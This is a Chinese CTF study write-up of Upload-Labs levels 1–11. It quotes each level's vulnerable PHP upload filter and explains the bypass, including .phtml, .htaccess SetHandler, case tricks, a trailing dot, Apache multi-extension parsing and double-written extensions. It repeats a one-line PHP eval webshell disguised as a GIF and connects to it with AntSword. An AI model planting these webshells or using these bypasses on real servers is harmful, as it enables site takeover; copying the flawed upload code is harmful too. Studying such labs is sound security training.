Upload-Labs-Linux1学习笔迹 （图文介绍）

lab 1

前端绕过jpg，后端改php后缀，通过蚁剑连接，在根目录下找到flag，

flag{71dc5328-c145-4fbf-a987-4dfb4c1dacd1}

//写以下文件a.jpgGIF89
<?php @eval($_POST['cmd']); ?>

labs 2

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {//检查提交if (file_exists(UPLOAD_PATH)) { //文件是否存在if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {$temp_file = $_FILES['upload_file']['tmp_name'];//路径中文件名分离$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '文件类型不正确，请重新上传！';}} else {$msg = UPLOAD_PATH.'文件夹不存在,请手工创建！';}
}

观察代码，同样没对图片进行检查，只对文件后缀名进行了前端验证（一句话木马，本篇通用）

//写以下文件a.jpgGIF89
<?php @eval($_POST['cmd']); ?>

修改文件jpg后缀为.php

打开图片链接

蚁剑连接

labs3

观察源码，对文件进行了些过滤，但是，这道图题还无需如此复杂，我们还是按照前两道题方式，上传文件，在burp中改名为phtml文件名后缀名，当然这种文件后缀名同样的可以被apache解析

//写以下文件a.jpgGIF89
<?php @eval($_POST['cmd']); ?>

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array('.asp','.aspx','.php','.jsp');//黑名单$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //收尾去空if(!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            if (move_uploaded_file($temp_file,$img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

连接成功！

labs4

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //收尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件不允许上传!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

观察源代码，首先是黑名单$deny_ext，基本上格式都给禁了，删除了文件末尾的点，以及空格，但是尝试的时候，他并没有在前端对数据进行验证，所以，我们通过 .htacsess文件，指定apache将某一个文件去解析为php执行

.htaccess文件<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>shell.jpg文件<?php @eval(@_POST['cmd']); ?>

成功拿到shell

labs5

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

观察代码，主要有哪些呢，首先，黑名单，两次去空格（这里就有思路了，Linux无法识别空格好像，我有点忘记了，有问题请纠正！！，我想的是上传 a.php 点 （空格）点,但是我想错了哈哈，在这个代码里面，他识别的最后一个点之前的东西都被当做文件名给除掉了，最终我上传a.php. . 最后变成了 e7d95617-19a9-4dba-86ae-20455d4a900e.node5.buuoj.cn:81/upload/202411040629294443.）

继续看代码，当他分理处文件名之后，通过随机数rand赋值，构成了新的文件名，所以，我好像不太有办法了，呜呜呜，看了下提示

似乎是想告诉我们，有哪些没被禁用的，大小写！！！，所以尝试构建一句话木马

b.php
GIF89
<?php @eval($_POST['b']); ?>

上传文件名后缀为.Php

上传成功

打开蚁剑连接

labs6？

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = $_FILES['upload_file']['name'];$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATAif (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file,$img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件不允许上传';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

继续审计，这一关新增了一个srtolower函数，将文件名改为大写，所以大小写就不能使用了，黑名单，文件去点，加上文件后缀截取，随机赋值

暂略

labs7

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

这道题的漏洞很明显，不如上一关，黑名单，去空格，文件后缀名，大小写，但是没有去点 

所以上传b.php.

GIF89
<?php @eval($_POST['b']); ?>

上传成功，蚁剑连接

labs8？

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

代码审计。老演员了都，黑名单，分离文件名，去点，转小写，随机赋值，但是这道题目，相比前面少了这个$DATA，？？？？

labs9

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

看着不难，我想，apache漏洞解决问题不大。

apache解析漏洞，一个文件名为test.x1.x2.x3的文件，apache会从x3的位置开始尝试解析，如果x3不属于apache能够解析的扩展名，那么apache会尝试去解析x2，直到能够解析到能够解析的为止，否则就会报错

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

连接成功

labs10

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = str_ireplace($deny_ext,"", $file_name);$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;        if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

这关代码明显少了不少，难道是....短小精悍（狗头） 看代码，黑名单，去空格，这里多了个新的函数

$file_name = str_ireplace($deny_ext,"", $file_name);

这段代码其实不难理解，首先str_irepace类似一个匹配函数，$deny_ext是作为搜寻的关键词，中间的" "是空字符串，也就是说，这串代码，会在$file_name这个字符串中搜索包含有$deny_ext的部分，如果有，就给替换为空字符，其他的，变化不大

方法1，匹配模式

双写绕过

str_irepace似乎只匹配一次，只需要对文件后缀名进行双写就好.pphphp，有点类似正则匹配的懒惰模式

最后过滤变成
cffad873-dcfb-45b2-99a1-a823e09ec071.node5.buuoj.cn:81/upload/b.php

蚁剑连接 ok

方法2：文件名可控

$img_path = UPLOAD_PATH.'/'.$file_name;

这个函数他的文件名是自定义的，那么，apache解析优先级php>html  但是又要最后一个后缀名 为jpg，那么构造 b.jpg.php.jpg

 

cceb43ae-5100-48df-aff8-e64affbed528.node5.buuoj.cn:81/upload/b.jpg.php.jpg得到

蚁剑连接

完全ok

labs11

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = '上传出错！';}} else{$msg = "只允许上传.jpg|.png|.gif类型文件！";}
}

观察源代码，最大的不同是由黑名单变成了白名单，这道题，尝试%00截断，好像不行，